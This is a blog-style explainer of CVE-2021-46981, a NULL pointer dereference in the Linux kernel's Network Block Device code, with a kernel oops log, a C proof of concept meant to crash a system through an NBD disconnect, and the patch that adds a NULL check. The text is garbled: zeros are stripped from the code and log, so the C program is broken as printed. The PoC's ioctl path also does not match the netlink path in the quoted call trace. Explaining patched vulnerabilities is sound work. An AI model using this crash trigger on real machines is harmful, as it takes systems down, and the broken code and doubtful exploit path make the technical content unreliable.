The Linux kernel is the backbone of countless systems, and even minor bugs can lead to serious issues. One such resolved bug is CVE-2021-46981, which affected the NBD (Network Block Device) subsystem. In simple terms, this bug allowed an attacker (or accident) to trigger a NULL pointer dereference, leading to a system crash (kernel panic).

This article unpacks what CVE-2021-46981 is, how it could be exploited, and how the Linux kernel was patched to fix this bug, using exclusive details and easy explanations. If you tinker with kernel code or care about system stability, this deep-dive is for you.

The Vulnerability in Brief

What is NBD?
The Network Block Device (NBD) is a Linux feature that allows you to access block devices (drives, partitions, images) over the network as if they were local. This is really useful, but like all code, it needs to be robust, especially if accessible by untrusted users.

What was wrong?
There was a logic bug where opening /dev/nbdX and then quickly disconnecting it could cause a part of the code to reference a NULL pointer. In kernel-space, this means a total system crash. Specifically, the issue lay in how the NBD code handled its internal recv_workq workqueue pointer.

If you

1. Open /dev/nbdX (where X is any available NBD device).

Immediately disconnect it (for example, through nbd-client -d or an ioctl call).

...then, due to a missing NULL check, the kernel might access nbd->recv_workq which hasn't yet been set up. This results in a NULL pointer dereference, causing a kernel oops and panic. Here is a real-life kernel message:

BUG: kernel NULL pointer dereference, address: 000000000000002
#PF: supervisor write access in kernel mode
...
RIP: 001:mutex_lock+x29/x60
Call Trace:
 flush_workqueue+x92/x6c
 nbd_disconnect_and_put+x81/xd
 nbd_genl_disconnect+x125/x2a
 ...

The Broken Logic

The NBD device uses a counter called config_refs to check if its configuration is in use. But due to the timing of events, it was possible to have config_refs == 1 while nbd->recv_workq was still NULL. When disconnecting, code like this would attempt to access it blindly:

flush_workqueue(nbd->recv_workq); // <- this could be NULL!

If nbd->recv_workq is NULL, the kernel triggers an oops and crashes.

Who Can Exploit It?

- Local users: Anyone with access to open and interact with /dev/nbdX, including low-privilege accounts, could reliably cause a kernel panic (denial of service).

Exploit Scenario (C Code Example)

Here's how someone might trigger this on a vulnerable kernel (as non-root, if permissions on /dev/nbdX allow):

#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/nbd.h>

int main() {
    int fd = open("/dev/nbd", O_RDWR);
    if (fd < ) {
        perror("open");
        return 1;
    }
    // Without proper setup, forcibly disconnect:
    if (ioctl(fd, NBD_DISCONNECT) < ) {
        perror("ioctl NBD_DISCONNECT");
    }
    close(fd);
    return ;
}

This simple code may cause your entire system to crash!
*Do not run on production or important systems!*

How the Linux Kernel Fixed It

The fix was straightforward: Add a NULL check before using flush_workqueue().

Developers added this guard to nbd_disconnect_and_put()

if (nbd->recv_workq)
    flush_workqueue(nbd->recv_workq);

This makes sure there’s a valid work queue to flush before trying to use it. If it’s not set up yet (still NULL), it safely skips the step and avoids the crash.

Original Patch Commit:
- kernel.org patch
- Out-of-tree discussion

Before

flush_workqueue(nbd->recv_workq);

After

if (nbd->recv_workq)
    flush_workqueue(nbd->recv_workq);

Timeline

- Vulnerability discovered/fixed: January 2021 (reference)

References & Further Reading

- Kernel Patch on kernel.org
- Exploit discussion on oss-security mailing list
- CVE entry on Mitre

Conclusion

CVE-2021-46981 is a classic example of how seemingly simple logic bugs in the kernel can have severe reliability and security consequences. This bug allowed any authorized user to take down a Linux system by triggering a NULL pointer dereference in the NBD subsystem.

The fix was simple: just check the pointer before using it. But uncovering that fix—and understanding why that check matters—tells us a lot about robust kernel design.

If you are running Linux systems with NBD, make sure you’re updated!
And if you hack on kernel code, always check your pointers.


*If you liked this breakdown, follow kernel.org security and @oss_security for more updates!*

---
Author: Security Deep-Dives

Timeline

Published on: 02/28/2024 09:15:37 UTC
Last modified on: 12/06/2024 15:59:55 UTC